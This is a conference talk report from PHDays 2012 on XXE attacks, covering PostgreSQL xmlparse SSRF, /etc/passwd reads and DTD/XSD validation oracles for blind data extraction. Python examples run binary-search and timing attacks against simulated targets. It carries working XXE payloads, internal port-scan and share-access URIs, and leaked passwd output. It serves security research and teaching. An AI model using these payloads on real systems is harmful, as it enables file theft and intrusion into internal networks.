ONsec PHDays 2012 XXE encapsulated report

PHDays report. Attacks on MS clients and blind XXE exploitation, encapsulated report. D0znpp, ONsec.

Attacks against Microsoft network web clients
PHDays, Russia, Moscow, 31/05/2012

Author bio: @d0znpp, d0znpp@onsec.ru

• Engaged in web application security research since 2004
• Founder and security expert of ONsec (since 2009)
• Nowadays: development of self-learning systems for the detection of attacks on web applications, and heuristic analysis

MS network under attack

• Trusted domain

• Same Origin Policy on trusted domain

• Local area network

• Security policy

• Bypass “no-proxy for local addresses”

• Profit

Blind XXE exploitation

Good morning. Wake up, 0day

PostgreSQL, all versions (8.4.11 Debian 4.4.5-8 tested):

SELECT xmlparse(document '<!DOCTYPE c [ <!ENTITY a SYSTEM "http://172.28.202.20/"> ]><c>&a;</c>');


No way to read content from the entity, but… the parser error quotes the offending line of the fetched document, so fragments of the remote response leak through the error message:

ERROR: invalid XML document
DETAIL: http://172.28.202.20/:1: parser error : StartTag: invalid element name
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x
                                                                                ^
http://172.28.202.20/:139: parser error : AttValue: " or ' expected
<img src='http://seclog.ru/main/logo.php' width=0 height=0/>

XXE basics

Parser bug (feature):
• To read local files
• To cause DoS (by reading /dev/zero, or via entity expansion loops)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [<!ENTITY e SYSTEM "/etc/passwd"> ]>
<a>&e;</a>

XXE applications

• Local files
• Internal network resources
• Port scan (http://192.168.0.1:22/)
• MS Windows network resources (\\ad\C$)
• Wrappers (ldap:// in Perl, expect://, ssh2:// etc.)

Classic XXE vuln

• Based on web application error messages that echo the input, such as: "Unknown language DATA", "Login DATA are not valid", "Password for user DATA does not match"
• Cannot read files containing characters that are invalid in XML content, such as 0x02, <, > etc.

Vuln which won the "Month of Yandex bugs hunting" contest

$ ./xxe-direct.pl --file="/etc/passwd"
<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:namesp2="http://namespaces.soaplite.com/perl" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:namesp84="http://xml.apache.org/xml-soap" xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode><faultstring xsi:type="xsd:string">Unknown language</faultstring><detail xsi:type="xsd:string">Unknown language root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh

What is wrong?
• The webapp may not display error messages
• You may want to get XML file contents in Java

Interesting XMLs:
• web.xml
• tomcat-users.xml
• jetty.xml
• httpd.conf (malformed as XML)

PHP way to read anything
• The PHP wrapper provides a filter function:
php://filter/convert.base64-encode/resource=web.xml
• But an error message that echoes the data is still needed

What is blind?
• Use DTD and XSD validation
• Get a validation result (status or errors)
• Use bruteforce, regexp, binary search and error message information (error-based) to read the external XML's structure and data

DTD based attack formula

XMLinp = DTDint + XMLint + XMLext
V(XMLinp, DTDint) = V(XMLint, DTDint) && V(XMLext, DTDint)

XMLinp – input XML stream
DTDint – internal DTD schema
XMLint – internal XML structure
XMLext – external XML (the XML to read)
V(xml, schema) – validation function, which returns a validation status (error message or boolean)

DTD based attack: from idea to schema

Input.xml:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY ext SYSTEM "web.xml">
<!ELEMENT root (secret+)>
<!ELEMENT secret (any+)>
<!ELEMENT any (#PCDATA)>
]>
<root>&ext;<secret><any>data</any></secret></root>

Web.xml (the external XML, pulled in through &ext;):
<?xml version="1.0"?><secret><any>data</any></secret>

→ XML validation error (or OK): the validation status tells whether Web.xml conforms to DTDint

Example #1. Read attribute value
<!ATTLIST key id (a|b) #REQUIRED>
<key id="secret"></key>

Value "secret" for attribute id of mountain is not among the enumerated set // LibXML
Attribute "key" with value "secret" must have a value from the list "a b ". // Xerces

Example #2. Brute external XML tag
<!DOCTYPE ext [<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext (root+)>]><ext>&a;</ext>
--> OK
<!DOCTYPE ext [<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext (foobar+)>]><ext>&a;</ext>
--> Element ext content does not follow the DTD, expecting (foobar)+, got (CDATA ) // LibXML PHP

Example #3. Read external XML (Java)
factory.setValidating(true); // SAXParserFactory or DocumentBuilderFactory
<!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM "web.xml">]><root>&a;</root>
Element type "bar" must be declared.
Where is the "bar" tag? "bar" is in web.xml!
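The loop behind Examples #2 and #3, as an added example that is not part of the original talk: the attacker side builds the probe document and parses the validator's error message (Xerces "must be declared", LibXML "expecting ... got ...") to learn one more element name per round. The target's validating parser is simulated here by a stand-in that resolves the entity to a constructed web.xml and reports the first undeclared element in document order, which is the Xerces behaviour the talk relies on; EXTERNAL_XML, probe_document, simulated_xerces and the other names are assumptions of this example, not the talk's code.

```python
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for the target's web.xml (the external XML the attacker cannot see).
EXTERNAL_XML = """<?xml version="1.0"?>
<web-app>
  <servlet><servlet-name>admin</servlet-name></servlet>
  <security-constraint><role-name>manager</role-name></security-constraint>
</web-app>"""

# Error-message shapes quoted in the talk (Xerces and LibXML).
XERCES_UNDECLARED = re.compile(r'Element type "([^"]+)" must be declared')
LIBXML_CONTENT = re.compile(r"expecting \(([^)]*)\)\+?, got \(([^)]*)\)")


def probe_document(declared):
    """Attacker side: wrap the external entity in a DTD that declares only the
    element names learned so far. Declared elements get content model ANY, so the
    only remaining validation error is 'must be declared' for the next unknown tag."""
    decls = "".join(f"<!ELEMENT {name} ANY>" for name in declared)
    return (
        '<?xml version="1.0"?>'
        f"<!DOCTYPE root [<!ELEMENT root ANY>{decls}"
        '<!ENTITY a SYSTEM "web.xml">]>'
        "<root>&a;</root>"
    )


def simulated_xerces(document):
    """Simulation of the target's validating parser (an assumption, not Xerces itself):
    resolves &a; to EXTERNAL_XML and reports the first element in document order
    that the DTD in `document` does not declare, using Xerces' wording."""
    declared = set(re.findall(r"<!ELEMENT\s+([\w.:-]+)", document))
    for elem in ET.fromstring(EXTERNAL_XML).iter():  # .iter() walks in document order
        if elem.tag not in declared:
            return f'Element type "{elem.tag}" must be declared.'
    return None  # document validated: nothing left to learn


def discover_elements(oracle, max_rounds=64):
    """Error-based blind XXE: one element name per round, until validation passes."""
    found = []
    for _ in range(max_rounds):
        error = oracle(probe_document(found))
        if error is None:
            break
        match = XERCES_UNDECLARED.search(error)
        if not match:
            raise ValueError(f"unexpected validator output: {error!r}")
        found.append(match.group(1))
    return found


def libxml_got_tags(error):
    """LibXML variant (Example #2): the 'got (...)' list names the external XML's
    top-level children directly; CDATA marks text nodes and is dropped."""
    match = LIBXML_CONTENT.search(error)
    if not match:
        return []
    return [tok for tok in match.group(2).split() if tok != "CDATA"]


if __name__ == "__main__":
    print(discover_elements(simulated_xerces))
    print(libxml_got_tags(
        "Element ext content does not follow the DTD, expecting (foobar)+, got (CDATA web-app )"))
```

Against a real target, `simulated_xerces` is replaced by a function that submits the probe to the application and returns the error text it echoes; the round count equals the number of distinct element names in the external file, which is why the talk calls the DTD route structure-only.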

Problems of DTD based attacks
• Example #3 doesn't work in LibXML PHP ;( Only the first tag name can be read (Example #2) from the DOM object in PHP (library bug).
• DTD can't be used to determine tag values (only tag names, document structure and attribute values)
• Bruteforce required if errors are not displayed
• Malformed XML such as httpd.conf can't be read

XSD based attack formula

XMLinp = DTDinp + XSDinp + XMLint + XMLext
V(XMLinp, DTDinp, XSDinp) = V(XMLint, DTDinp, XSDinp) && V(XMLext, DTDinp, XSDinp)

XMLinp – input XML stream
DTDinp – input DTD schema
XSDinp – input XSD schema
XMLint – internal XML structure
XMLext – external XML (the XML to read)
V(xml, dtd, xsd) – validation function, which returns a validation status (error message or boolean)

XSD based attack: from idea to schema

Input.xml:
<?xml version="1.0" ?>
<!DOCTYPE root [<!ENTITY ext SYSTEM "web.xml">]>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://myhost/int.xsd">
&ext;<secret><any>data</any></secret></root>

Web.xml (the external XML, pulled in through &ext;):
<?xml version="1.0"?><secret><any>data</any></secret>

→ XML validation error (or OK): the validation status tells whether Web.xml conforms to the attacker-supplied int.xsd

Example #4. Read tag values (XSD)
parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage", "http://www.w3.org/2001/XMLSchema"); // SAXParserFactory or DocumentBuilderFactory

<!ENTITY ext SYSTEM "web.xml">
<contacts xsi:noNamespaceSchemaLocation="int.xsd">

int.xsd:
<xs:element name="password" type="xs:int"/>

cvc-datatype-valid.1.2.1: 'Secret' is not a valid value for 'integer'.
cvc-type.3.1.3: The value 'Secret' of element 'password' is not valid. // Xerces

Binary search basics

(decision tree: each probe halves the candidate range of the character)
a-n?
    yes: a-h?
        yes: a-e?
        no:  h-n?
    no:  m-z?

Faster binary search
• Phonetic chains
• Probability with which one letter follows another
• Based on phonetic features of languages
• Can be used to make text reading by binary search faster
http://exploit-db.com/papers/13969/

Example #5. Binary search for tag value (XSD)
<xs:element name="password" type="PWD"/>
…
<xs:simpleType name="PWD">
  <xs:restriction base="xs:token">
    <xs:pattern value="[a-m]{1}[a-z]+"/>
  </xs:restriction>
</xs:simpleType>

If the first character of the password tag value is between "a" and "m", validation succeeds, otherwise it fails

And what about attacks without validation status?

• Use something like time-based attacks!
• An XSD validator validates all tags, even when some of them are already invalid
• Parser != Interpreter
• What can we do in that case?

Example #6. 2blind attacks

<xs:element name="secret">
  <xs:complexType>
    <xs:choice>
      <xs:group ref="conditionGrp"/>
      <xs:group ref="highloadGrp"/>
    </xs:choice>
  </xs:complexType>
</xs:element>

If the value of the secret tag matches conditionGrp, the parser doesn't evaluate the regexp from highloadGrp.

So make the highloadGrp regexp really expensive ;) The response time then tells whether conditionGrp matched.
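The value-reading procedure of Examples #5 and #6, as one added example (not the talk's own code): recover_value performs the binary search over an alphabet one character at a time and emits the xs:pattern for each probe; status_oracle models Example #5 (the target reports valid/invalid) and make_timing_oracle models Example #6 (only the response time is observable, because highloadGrp's regexp runs only when conditionGrp fails). Everything on the target side is simulated with Python's re module as a stand-in for the XSD validator; SECRET, ALPHABET, HIGHLOAD and the function names are assumptions of this example, and Python and XSD regex syntax agree for the character classes and the implicit whole-value anchoring used here.

```python
import re
import time

# Constructed secret standing in for the value of the external XML's <password> element.
SECRET = "s3cretpa55w0rd"
# Candidate characters; the search halves this list with every probe.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def prefix_pattern(prefix, chars=None):
    """XSD regex: value starts with `prefix`, then one char from `chars`, then anything.
    XSD patterns are implicitly anchored to the whole value, hence re.fullmatch below."""
    cls = "" if chars is None else "[" + "".join(chars) + "]"
    return re.escape(prefix) + cls + ".*"


def schema_for(pattern):
    """The int.xsd the attacker serves (shape of Example #5) with the probe pattern inserted."""
    return (
        '<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">'
        '<xs:element name="password"><xs:simpleType>'
        '<xs:restriction base="xs:token">'
        f'<xs:pattern value="{pattern}"/>'
        "</xs:restriction></xs:simpleType></xs:element></xs:schema>"
    )


def recover_value(oracle, max_len=32):
    """Binary search over ALPHABET, one character per round, driven by any True/False oracle.
    Assumes every character of the value is in ALPHABET."""
    prefix = ""
    while len(prefix) < max_len:
        if oracle(re.escape(prefix)):       # value is exactly `prefix`: done
            return prefix
        lo, hi = 0, len(ALPHABET)           # candidates for the next char: ALPHABET[lo:hi]
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(prefix_pattern(prefix, ALPHABET[lo:mid])):
                hi = mid
            else:
                lo = mid
        prefix += ALPHABET[lo]
    return prefix


def status_oracle(pattern):
    """Example #5: the target reports whether validation passed (validator simulated by re)."""
    return re.fullmatch(pattern, SECRET) is not None


# highloadGrp: nested quantifiers backtrack exponentially on any alphanumeric value
# lacking '!', so this costs time only when conditionGrp did not match.
HIGHLOAD = "([a-z0-9]+)+!"


def simulated_choice_validation(condition_pattern):
    """Simulation of an xs:choice validator: conditionGrp first, highloadGrp only if it failed."""
    if re.fullmatch(condition_pattern, SECRET):
        return
    re.fullmatch(HIGHLOAD, SECRET)


def elapsed(condition_pattern, repeats=3):
    """Smallest of several timings: the minimum is the most noise-resistant estimate."""
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        simulated_choice_validation(condition_pattern)
        best = min(best, time.perf_counter() - start)
    return best


def make_timing_oracle():
    """Example #6: calibrate a threshold from a surely-matching probe ('.*', fast path)
    and a surely-failing one ('!', slow path), then classify probes by response time."""
    fast, slow = elapsed(".*"), elapsed("!")
    threshold = (fast * slow) ** 0.5        # geometric mean sits between the two regimes
    return lambda pattern: elapsed(pattern) < threshold


if __name__ == "__main__":
    print(schema_for(prefix_pattern("s3", ALPHABET[:18])))
    print("status-based :", recover_value(status_oracle))
    print("timing-based :", recover_value(make_timing_oracle()))
```

Against a real target, each oracle submits Input.xml with a freshly served int.xsd and observes either the validation result or the round-trip time; the phonetic-chain ordering from the previous slide plugs in by reordering ALPHABET per position so that likely characters are reached in fewer probes.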

Problems of XSD based attacks

• Internal XSD validation is rare in the wild
• Only 4% of all webapps with XXE vulns do that*
• Cannot be used to read malformed XML, such as httpd.conf

* By our stats from security audits since 2009

??? (Questions)

@d0znpp, d0znpp@onsec.ru